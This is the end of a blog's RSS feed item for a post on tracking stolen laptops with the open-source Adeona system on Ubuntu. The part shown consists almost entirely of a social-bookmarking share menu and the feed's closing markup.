		<li class="sexy-blogmarks">
			<a href="http://blogmarks.net/my/new.php?mini=1&amp;simple=1&amp;url=http://www.64bitjungle.com/ubuntu/track-and-trace-your-stolen-or-missing-laptop-with-adeona-on-32-and-64-bit-ubuntu/&amp;title=Track+and+Trace+your+stolen+or+missing+Laptop+with+Adeona%2C+on+32+and+64+Bit+Ubuntu" rel="nofollow" class="external" title="Mark this on BlogMarks">Mark this on BlogMarks</a>
		</li>
		<li class="sexy-twittley">
			<a href="http://twittley.com/submit/?title=Track+and+Trace+your+stolen+or+missing+Laptop+with+Adeona%2C+on+32+and+64+Bit+Ubuntu&amp;url=http%3A%2F%2Fwww.64bitjungle.com%2Fubuntu%2Ftrack-and-trace-your-stolen-or-missing-laptop-with-adeona-on-32-and-64-bit-ubuntu%2F&amp;desc=%0D%0AAdeona%20is%20an%20Open%20Source%20system%20for%20tracking%20stolen%20and%20lost%20laptops%2Fnotebooks%2C%20developed%20by%20the%20University%20of%20Washington%20Computer%20Science%20and%20Engineering%20department.%20It%27s%20also%20one%20of%20the%20few%20systems%20which%20doesn%27t%20require%20a%20silly%20BIOS%20hack%2C%20or%20access%20to%20proprietary%20services%2C%20and%20is%20available%20for%20L&amp;pcat=Technology&amp;tags=" rel="nofollow" class="external" title="Submit this to Twittley">Submit this to Twittley</a>
		</li>
		<li class="sexy-fwisp">
			<a href="http://fwisp.com/submit?url=http://www.64bitjungle.com/ubuntu/track-and-trace-your-stolen-or-missing-laptop-with-adeona-on-32-and-64-bit-ubuntu/" rel="nofollow" class="external" title="Share this on Fwisp">Share this on Fwisp</a>
		</li>
		<li class="sexy-designmoo">
			<a href="http://designmoo.com/submit?url=http://www.64bitjungle.com/ubuntu/track-and-trace-your-stolen-or-missing-laptop-with-adeona-on-32-and-64-bit-ubuntu/&amp;title=Track+and+Trace+your+stolen+or+missing+Laptop+with+Adeona%2C+on+32+and+64+Bit+Ubuntu&amp;body=%0D%0AAdeona%20is%20an%20Open%20Source%20system%20for%20tracking%20stolen%20and%20lost%20laptops%2Fnotebooks%2C%20developed%20by%20the%20University%20of%20Washington%20Computer%20Science%20and%20Engineering%20department.%20It%27s%20also%20one%20of%20the%20few%20systems%20which%20doesn%27t%20require%20a%20silly%20BIOS%20hack%2C%20or%20access%20to%20proprietary%20services%2C%20and%20is%20available%20for%20L" rel="nofollow" class="external" title="Moo this on DesignMoo!">Moo this on DesignMoo!</a>
		</li>
		<li class="sexy-bobrdobr">
			<a href="http://bobrdobr.ru/addext.html?url=http://www.64bitjungle.com/ubuntu/track-and-trace-your-stolen-or-missing-laptop-with-adeona-on-32-and-64-bit-ubuntu/&amp;title=Track+and+Trace+your+stolen+or+missing+Laptop+with+Adeona%2C+on+32+and+64+Bit+Ubuntu" rel="nofollow" class="external" title="Share this on BobrDobr">Share this on BobrDobr</a>
		</li>
		<li class="sexy-yandex">
			<a href="http://zakladki.yandex.ru/userarea/links/addfromfav.asp?bAddLink_x=1&amp;lurl=http://www.64bitjungle.com/ubuntu/track-and-trace-your-stolen-or-missing-laptop-with-adeona-on-32-and-64-bit-ubuntu/&amp;lname=Track+and+Trace+your+stolen+or+missing+Laptop+with+Adeona%2C+on+32+and+64+Bit+Ubuntu" rel="nofollow" class="external" title="Add this to Yandex.Bookmarks">Add this to Yandex.Bookmarks</a>
		</li>
		<li class="sexy-memoryru">
			<a href="http://memori.ru/link/?sm=1&amp;u_data[url]=http://www.64bitjungle.com/ubuntu/track-and-trace-your-stolen-or-missing-laptop-with-adeona-on-32-and-64-bit-ubuntu/&amp;u_data[name]=Track+and+Trace+your+stolen+or+missing+Laptop+with+Adeona%2C+on+32+and+64+Bit+Ubuntu" rel="nofollow" class="external" title="Add this to Memory.ru">Add this to Memory.ru</a>
		</li>
		<li class="sexy-100zakladok">
			<a href="http://www.100zakladok.ru/save/?bmurl=http://www.64bitjungle.com/ubuntu/track-and-trace-your-stolen-or-missing-laptop-with-adeona-on-32-and-64-bit-ubuntu/&amp;bmtitle=Track+and+Trace+your+stolen+or+missing+Laptop+with+Adeona%2C+on+32+and+64+Bit+Ubuntu" rel="nofollow" class="external" title="Add this to 100 bookmarks">Add this to 100 bookmarks</a>
		</li>
		<li class="sexy-moemesto">
			<a href="http://moemesto.ru/post.php?url=http://www.64bitjungle.com/ubuntu/track-and-trace-your-stolen-or-missing-laptop-with-adeona-on-32-and-64-bit-ubuntu/&amp;title=Track+and+Trace+your+stolen+or+missing+Laptop+with+Adeona%2C+on+32+and+64+Bit+Ubuntu" rel="nofollow" class="external" title="Add this to MyPlace">Add this to MyPlace</a>
		</li>
		<li class="sexy-hackernews">
			<a href="http://news.ycombinator.com/submitlink?u=http://www.64bitjungle.com/ubuntu/track-and-trace-your-stolen-or-missing-laptop-with-adeona-on-32-and-64-bit-ubuntu/&amp;t=Track+and+Trace+your+stolen+or+missing+Laptop+with+Adeona%2C+on+32+and+64+Bit+Ubuntu" rel="nofollow" class="external" title="Submit this to Hacker News">Submit this to Hacker News</a>
		</li>
		<li class="sexy-printfriendly">
			<a href="http://www.printfriendly.com/print?url=http://www.64bitjungle.com/ubuntu/track-and-trace-your-stolen-or-missing-laptop-with-adeona-on-32-and-64-bit-ubuntu/" rel="nofollow" class="external" title="Send this page to Print Friendly">Send this page to Print Friendly</a>
		</li>
		<li class="sexy-designbump">
			<a href="http://designbump.com/submit?url=http://www.64bitjungle.com/ubuntu/track-and-trace-your-stolen-or-missing-laptop-with-adeona-on-32-and-64-bit-ubuntu/&amp;title=Track+and+Trace+your+stolen+or+missing+Laptop+with+Adeona%2C+on+32+and+64+Bit+Ubuntu&amp;body=%0D%0AAdeona%20is%20an%20Open%20Source%20system%20for%20tracking%20stolen%20and%20lost%20laptops%2Fnotebooks%2C%20developed%20by%20the%20University%20of%20Washington%20Computer%20Science%20and%20Engineering%20department.%20It%27s%20also%20one%20of%20the%20few%20systems%20which%20doesn%27t%20require%20a%20silly%20BIOS%20hack%2C%20or%20access%20to%20proprietary%20services%2C%20and%20is%20available%20for%20L" rel="nofollow" class="external" title="Bump this on DesignBump">Bump this on DesignBump</a>
		</li>
		<li class="sexy-ning">
			<a href="http://bookmarks.ning.com/addItem.php?url=http://www.64bitjungle.com/ubuntu/track-and-trace-your-stolen-or-missing-laptop-with-adeona-on-32-and-64-bit-ubuntu/&amp;T=Track+and+Trace+your+stolen+or+missing+Laptop+with+Adeona%2C+on+32+and+64+Bit+Ubuntu" rel="nofollow" class="external" title="Add this to Ning">Add this to Ning</a>
		</li>
		<li class="sexy-identica">
			<a href="http://identi.ca//index.php?action=newnotice&amp;status_textarea=Reading:+&quot;Track+and+Trace+your+stolen+or+missing+Laptop+with+Adeona%2C+on+32+and+64+Bit+Ubun%5B..%5D&quot;+-+from+http://tinyurl.com/6hfld3" rel="nofollow" class="external" title="Post this to Identica">Post this to Identica</a>
		</li>
		<li class="sexy-xerpi">
			<a href="http://www.xerpi.com/block/add_link_from_extension?url=http://www.64bitjungle.com/ubuntu/track-and-trace-your-stolen-or-missing-laptop-with-adeona-on-32-and-64-bit-ubuntu/&amp;title=Track+and+Trace+your+stolen+or+missing+Laptop+with+Adeona%2C+on+32+and+64+Bit+Ubuntu" rel="nofollow" class="external" title="Save this to Xerpi">Save this to Xerpi</a>
		</li>
		<li class="sexy-wikio">
			<a href="http://www.wikio.com/sharethis?url=http://www.64bitjungle.com/ubuntu/track-and-trace-your-stolen-or-missing-laptop-with-adeona-on-32-and-64-bit-ubuntu/&amp;title=Track+and+Trace+your+stolen+or+missing+Laptop+with+Adeona%2C+on+32+and+64+Bit+Ubuntu" rel="nofollow" class="external" title="Share this on Wikio">Share this on Wikio</a>
		</li>
		<li class="sexy-techmeme">
			<a href="http://twitter.com/home/?status=Tip+@Techmeme+http://www.64bitjungle.com/ubuntu/track-and-trace-your-stolen-or-missing-laptop-with-adeona-on-32-and-64-bit-ubuntu/+&quot;Track+and+Trace+your+stolen+or+missing+Laptop+with+Adeona%2C+on+32+and+64+Bit+Ubuntu&quot;" rel="nofollow" class="external" title="Tip this to TechMeme">Tip this to TechMeme</a>
		</li>
		<li class="sexy-sphinn">
			<a href="http://sphinn.com/index.php?c=post&amp;m=submit&amp;link=http://www.64bitjungle.com/ubuntu/track-and-trace-your-stolen-or-missing-laptop-with-adeona-on-32-and-64-bit-ubuntu/" rel="nofollow" class="external" title="Sphinn this on Sphinn">Sphinn this on Sphinn</a>
		</li>
		<li class="sexy-posterous">
			<a href="http://posterous.com/share?linkto=http://www.64bitjungle.com/ubuntu/track-and-trace-your-stolen-or-missing-laptop-with-adeona-on-32-and-64-bit-ubuntu/&amp;title=Track+and+Trace+your+stolen+or+missing+Laptop+with+Adeona%2C+on+32+and+64+Bit+Ubuntu&amp;selection=%0D%0AAdeona%20is%20an%20Open%20Source%20system%20for%20tracking%20stolen%20and%20lost%20laptops%2Fnotebooks%2C%20developed%20by%20the%20University%20of%20Washington%20Computer%20Science%20and%20Engineering%20department.%20It%27s%20also%20one%20of%20the%20few%20systems%20which%20doesn%27t%20require%20a%20silly%20BIOS%20hack%2C%20or%20access%20to%20proprietary%20services%2C%20and%20is%20available%20for%20L" rel="nofollow" class="external" title="Post this to Posterous">Post this to Posterous</a>
		</li>
		<li class="sexy-globalgrind">
			<a href="http://globalgrind.com/submission/submit.aspx?url=http://www.64bitjungle.com/ubuntu/track-and-trace-your-stolen-or-missing-laptop-with-adeona-on-32-and-64-bit-ubuntu/&amp;type=Article&amp;title=Track+and+Trace+your+stolen+or+missing+Laptop+with+Adeona%2C+on+32+and+64+Bit+Ubuntu" rel="nofollow" class="external" title="Grind this! on Global Grind">Grind this! on Global Grind</a>
		</li>
		<li class="sexy-pingfm">
			<a href="http://ping.fm/ref/?link=http://www.64bitjungle.com/ubuntu/track-and-trace-your-stolen-or-missing-laptop-with-adeona-on-32-and-64-bit-ubuntu/&amp;title=Track+and+Trace+your+stolen+or+missing+Laptop+with+Adeona%2C+on+32+and+64+Bit+Ubuntu&amp;body=%0D%0AAdeona%20is%20an%20Open%20Source%20system%20for%20tracking%20stolen%20and%20lost%20laptops%2Fnotebooks%2C%20developed%20by%20the%20University%20of%20Washington%20Computer%20Science%20and%20Engineering%20department.%20It%27s%20also%20one%20of%20the%20few%20systems%20which%20doesn%27t%20require%20a%20silly%20BIOS%20hack%2C%20or%20access%20to%20proprietary%20services%2C%20and%20is%20available%20for%20L" rel="nofollow" class="external" title="Ping this on Ping.fm">Ping this on Ping.fm</a>
		</li>
		<li class="sexy-nujij">
			<a href="http://nujij.nl/jij.lynkx?t=Track+and+Trace+your+stolen+or+missing+Laptop+with+Adeona%2C+on+32+and+64+Bit+Ubuntu&amp;u=http://www.64bitjungle.com/ubuntu/track-and-trace-your-stolen-or-missing-laptop-with-adeona-on-32-and-64-bit-ubuntu/&amp;b=%0D%0AAdeona%20is%20an%20Open%20Source%20system%20for%20tracking%20stolen%20and%20lost%20laptops%2Fnotebooks%2C%20developed%20by%20the%20University%20of%20Washington%20Computer%20Science%20and%20Engineering%20department.%20It%27s%20also%20one%20of%20the%20few%20systems%20which%20doesn%27t%20require%20a%20silly%20BIOS%20hack%2C%20or%20access%20to%20proprietary%20services%2C%20and%20is%20available%20for%20L" rel="nofollow" class="external" title="Submit this to NUjij">Submit this to NUjij</a>
		</li>
		<li class="sexy-ekudos">
			<a href="http://www.ekudos.nl/artikel/nieuw?url=http://www.64bitjungle.com/ubuntu/track-and-trace-your-stolen-or-missing-laptop-with-adeona-on-32-and-64-bit-ubuntu/&amp;title=Track+and+Trace+your+stolen+or+missing+Laptop+with+Adeona%2C+on+32+and+64+Bit+Ubuntu&amp;desc=%0D%0AAdeona%20is%20an%20Open%20Source%20system%20for%20tracking%20stolen%20and%20lost%20laptops%2Fnotebooks%2C%20developed%20by%20the%20University%20of%20Washington%20Computer%20Science%20and%20Engineering%20department.%20It%27s%20also%20one%20of%20the%20few%20systems%20which%20doesn%27t%20require%20a%20silly%20BIOS%20hack%2C%20or%20access%20to%20proprietary%20services%2C%20and%20is%20available%20for%20L" rel="nofollow" class="external" title="Submit this to eKudos">Submit this to eKudos</a>
		</li>
		<li class="sexy-netvouz">
			<a href="http://www.netvouz.com/action/submitBookmark?url=http://www.64bitjungle.com/ubuntu/track-and-trace-your-stolen-or-missing-laptop-with-adeona-on-32-and-64-bit-ubuntu/&amp;title=Track+and+Trace+your+stolen+or+missing+Laptop+with+Adeona%2C+on+32+and+64+Bit+Ubuntu&amp;popup=no" rel="nofollow" class="external" title="Submit this to Netvouz">Submit this to Netvouz</a>
		</li>
		<li class="sexy-netvibes">
			<a href="http://www.netvibes.com/share?title=Track+and+Trace+your+stolen+or+missing+Laptop+with+Adeona%2C+on+32+and+64+Bit+Ubuntu&amp;url=http://www.64bitjungle.com/ubuntu/track-and-trace-your-stolen-or-missing-laptop-with-adeona-on-32-and-64-bit-ubuntu/" rel="nofollow" class="external" title="Submit this to Netvibes">Submit this to Netvibes</a>
		</li>
		<li class="sexy-fleck">
			<a href="http://beta3.fleck.com/bookmarklet.php?url=http://www.64bitjungle.com/ubuntu/track-and-trace-your-stolen-or-missing-laptop-with-adeona-on-32-and-64-bit-ubuntu/&amp;title=Track+and+Trace+your+stolen+or+missing+Laptop+with+Adeona%2C+on+32+and+64+Bit+Ubuntu" rel="nofollow" class="external" title="Share this on Fleck">Share this on Fleck</a>
		</li>
		<li class="sexy-blogospherenews">
			<a href="http://www.blogospherenews.com/submit.php?url=http://www.64bitjungle.com/ubuntu/track-and-trace-your-stolen-or-missing-laptop-with-adeona-on-32-and-64-bit-ubuntu/&amp;title=Track+and+Trace+your+stolen+or+missing+Laptop+with+Adeona%2C+on+32+and+64+Bit+Ubuntu" rel="nofollow" class="external" title="Share this on Blogosphere News">Share this on Blogosphere News</a>
		</li>
		<li class="sexy-webblend">
			<a href="http://thewebblend.com/submit?url=http://www.64bitjungle.com/ubuntu/track-and-trace-your-stolen-or-missing-laptop-with-adeona-on-32-and-64-bit-ubuntu/&amp;title=Track+and+Trace+your+stolen+or+missing+Laptop+with+Adeona%2C+on+32+and+64+Bit+Ubuntu&amp;body=%0D%0AAdeona%20is%20an%20Open%20Source%20system%20for%20tracking%20stolen%20and%20lost%20laptops%2Fnotebooks%2C%20developed%20by%20the%20University%20of%20Washington%20Computer%20Science%20and%20Engineering%20department.%20It%27s%20also%20one%20of%20the%20few%20systems%20which%20doesn%27t%20require%20a%20silly%20BIOS%20hack%2C%20or%20access%20to%20proprietary%20services%2C%20and%20is%20available%20for%20L" rel="nofollow" class="external" title="Blend this!">Blend this!</a>
		</li>
		<li class="sexy-wykop">
			<a href="http://www.wykop.pl/dodaj?url=http://www.64bitjungle.com/ubuntu/track-and-trace-your-stolen-or-missing-laptop-with-adeona-on-32-and-64-bit-ubuntu/&amp;title=Track+and+Trace+your+stolen+or+missing+Laptop+with+Adeona%2C+on+32+and+64+Bit+Ubuntu" rel="nofollow" class="external" title="Add this to Wykop!">Add this to Wykop!</a>
		</li>
		<li class="sexy-blogengage">
			<a href="http://www.blogengage.com/submit.php?url=http://www.64bitjungle.com/ubuntu/track-and-trace-your-stolen-or-missing-laptop-with-adeona-on-32-and-64-bit-ubuntu/" rel="nofollow" class="external" title="Engage with this article!">Engage with this article!</a>
		</li>
		<li class="sexy-hyves">
			<a href="http://www.hyves.nl/profilemanage/add/tips/?name=Track+and+Trace+your+stolen+or+missing+Laptop+with+Adeona%2C+on+32+and+64+Bit+Ubuntu&amp;text=%0D%0AAdeona%20is%20an%20Open%20Source%20system%20for%20tracking%20stolen%20and%20lost%20laptops%2Fnotebooks%2C%20developed%20by%20the%20University%20of%20Washington%20Computer%20Science%20and%20Engineering%20department.%20It%27s%20also%20one%20of%20the%20few%20systems%20which%20doesn%27t%20require%20a%20silly%20BIOS%20hack%2C%20or%20access%20to%20proprietary%20services%2C%20and%20is%20available%20for%20L+-+http://www.64bitjungle.com/ubuntu/track-and-trace-your-stolen-or-missing-laptop-with-adeona-on-32-and-64-bit-ubuntu/&amp;rating=5" rel="nofollow" class="external" title="Share this on Hyves">Share this on Hyves</a>
		</li>
		<li class="sexy-pusha">
			<a href="http://www.pusha.se/posta?url=http://www.64bitjungle.com/ubuntu/track-and-trace-your-stolen-or-missing-laptop-with-adeona-on-32-and-64-bit-ubuntu/&amp;title=Track+and+Trace+your+stolen+or+missing+Laptop+with+Adeona%2C+on+32+and+64+Bit+Ubuntu" rel="nofollow" class="external" title="Push this on Pusha">Push this on Pusha</a>
		</li>
		<li class="sexy-hatena">
			<a href="http://b.hatena.ne.jp/add?mode=confirm&amp;url=http://www.64bitjungle.com/ubuntu/track-and-trace-your-stolen-or-missing-laptop-with-adeona-on-32-and-64-bit-ubuntu/&amp;title=Track+and+Trace+your+stolen+or+missing+Laptop+with+Adeona%2C+on+32+and+64+Bit+Ubuntu" rel="nofollow" class="external" title="Bookmarks this on Hatena Bookmarks">Bookmarks this on Hatena Bookmarks</a>
		</li>
		<li class="sexy-mylinkvault">
			<a href="http://www.mylinkvault.com/link-page.php?u=http://www.64bitjungle.com/ubuntu/track-and-trace-your-stolen-or-missing-laptop-with-adeona-on-32-and-64-bit-ubuntu/&amp;n=Track+and+Trace+your+stolen+or+missing+Laptop+with+Adeona%2C+on+32+and+64+Bit+Ubuntu" rel="nofollow" class="external" title="Store this link on MyLinkVault">Store this link on MyLinkVault</a>
		</li>
		<li class="sexy-slashdot">
			<a href="http://slashdot.org/bookmark.pl?url=http://www.64bitjungle.com/ubuntu/track-and-trace-your-stolen-or-missing-laptop-with-adeona-on-32-and-64-bit-ubuntu/&amp;title=Track+and+Trace+your+stolen+or+missing+Laptop+with+Adeona%2C+on+32+and+64+Bit+Ubuntu" rel="nofollow" class="external" title="Submit this to SlashDot">Submit this to SlashDot</a>
		</li>
		<li class="sexy-squidoo">
			<a href="http://www.squidoo.com/lensmaster/bookmark?http://www.64bitjungle.com/ubuntu/track-and-trace-your-stolen-or-missing-laptop-with-adeona-on-32-and-64-bit-ubuntu/" rel="nofollow" class="external" title="Add to a lense on Squidoo">Add to a lense on Squidoo</a>
		</li>
		<li class="sexy-propeller">
			<a href="http://www.propeller.com/submit/?url=http://www.64bitjungle.com/ubuntu/track-and-trace-your-stolen-or-missing-laptop-with-adeona-on-32-and-64-bit-ubuntu/" rel="nofollow" class="external" title="Submit this story to Propeller">Submit this story to Propeller</a>
		</li>
		<li class="sexy-faqpal">
			<a href="http://www.faqpal.com/submit?url=http://www.64bitjungle.com/ubuntu/track-and-trace-your-stolen-or-missing-laptop-with-adeona-on-32-and-64-bit-ubuntu/" rel="nofollow" class="external" title="Submit this to FAQpal">Submit this to FAQpal</a>
		</li>
		<li class="sexy-evernote">
			<a href="http://www.evernote.com/clip.action?url=http://www.64bitjungle.com/ubuntu/track-and-trace-your-stolen-or-missing-laptop-with-adeona-on-32-and-64-bit-ubuntu/&amp;title=Track+and+Trace+your+stolen+or+missing+Laptop+with+Adeona%2C+on+32+and+64+Bit+Ubuntu" rel="nofollow" class="external" title="Clip this to Evernote">Clip this to Evernote</a>
		</li>
		<li class="sexy-meneame">
			<a href="http://meneame.net/submit.php?url=http://www.64bitjungle.com/ubuntu/track-and-trace-your-stolen-or-missing-laptop-with-adeona-on-32-and-64-bit-ubuntu/" rel="nofollow" class="external" title="Submit this to Meneame">Submit this to Meneame</a>
		</li>
		<li class="sexy-bitacoras">
			<a href="http://bitacoras.com/anotaciones/http://www.64bitjungle.com/ubuntu/track-and-trace-your-stolen-or-missing-laptop-with-adeona-on-32-and-64-bit-ubuntu/" rel="nofollow" class="external" title="Submit this to Bitacoras">Submit this to Bitacoras</a>
		</li>
		<li class="sexy-jumptags">
			<a href="http://www.jumptags.com/add/?url=http://www.64bitjungle.com/ubuntu/track-and-trace-your-stolen-or-missing-laptop-with-adeona-on-32-and-64-bit-ubuntu/&amp;title=Track+and+Trace+your+stolen+or+missing+Laptop+with+Adeona%2C+on+32+and+64+Bit+Ubuntu" rel="nofollow" class="external" title="Submit this link to JumpTags">Submit this link to JumpTags</a>
		</li>
		<li class="sexy-bebo">
			<a href="http://www.bebo.com/c/share?Url=http://www.64bitjungle.com/ubuntu/track-and-trace-your-stolen-or-missing-laptop-with-adeona-on-32-and-64-bit-ubuntu/&amp;Title=Track+and+Trace+your+stolen+or+missing+Laptop+with+Adeona%2C+on+32+and+64+Bit+Ubuntu" rel="nofollow" class="external" title="Share this on Bebo">Share this on Bebo</a>
		</li>
		<li class="sexy-n4g">
			<a href="http://www.n4g.com/tips.aspx?url=http://www.64bitjungle.com/ubuntu/track-and-trace-your-stolen-or-missing-laptop-with-adeona-on-32-and-64-bit-ubuntu/&amp;title=Track+and+Trace+your+stolen+or+missing+Laptop+with+Adeona%2C+on+32+and+64+Bit+Ubuntu" rel="nofollow" class="external" title="Submit tip to N4G">Submit tip to N4G</a>
		</li>
		<li class="sexy-orkut">
			<a href="http://promote.orkut.com/preview?nt=orkut.com&amp;tt=Track+and+Trace+your+stolen+or+missing+Laptop+with+Adeona%2C+on+32+and+64+Bit+Ubuntu&amp;du=http://www.64bitjungle.com/ubuntu/track-and-trace-your-stolen-or-missing-laptop-with-adeona-on-32-and-64-bit-ubuntu/&amp;cn=%0D%0AAdeona%20is%20an%20Open%20Source%20system%20for%20tracking%20stolen%20and%20lost%20laptops%2Fnotebooks%2C%20developed%20by%20the%20University%20of%20Washington%20Computer%20Science%20and%20Engineering%20department.%20It%27s%20also%20one%20of%20the%20few%20systems%20which%20doesn%27t%20require%20a%20silly%20BIOS%20hack%2C%20or%20access%20to%20proprietary%20services%2C%20and%20is%20available%20for%20L" rel="nofollow" class="external" title="Promote this on Orkut">Promote this on Orkut</a>
		</li>
</ul>
<div style="clear:both;"></div>
</div>
<!-- End SexyBookmarks Menu Code -->



<p>No related posts.</p>
<p>Related posts brought to you by <a href='http://mitcho.com/code/yarpp/'>Yet Another Related Posts Plugin</a>.</p>]]></content:encoded>
			<wfw:commentRss>http://www.64bitjungle.com/ubuntu/track-and-trace-your-stolen-or-missing-laptop-with-adeona-on-32-and-64-bit-ubuntu/feed/</wfw:commentRss>
		<slash:comments>4</slash:comments>
		</item>
	</channel>
</rss>
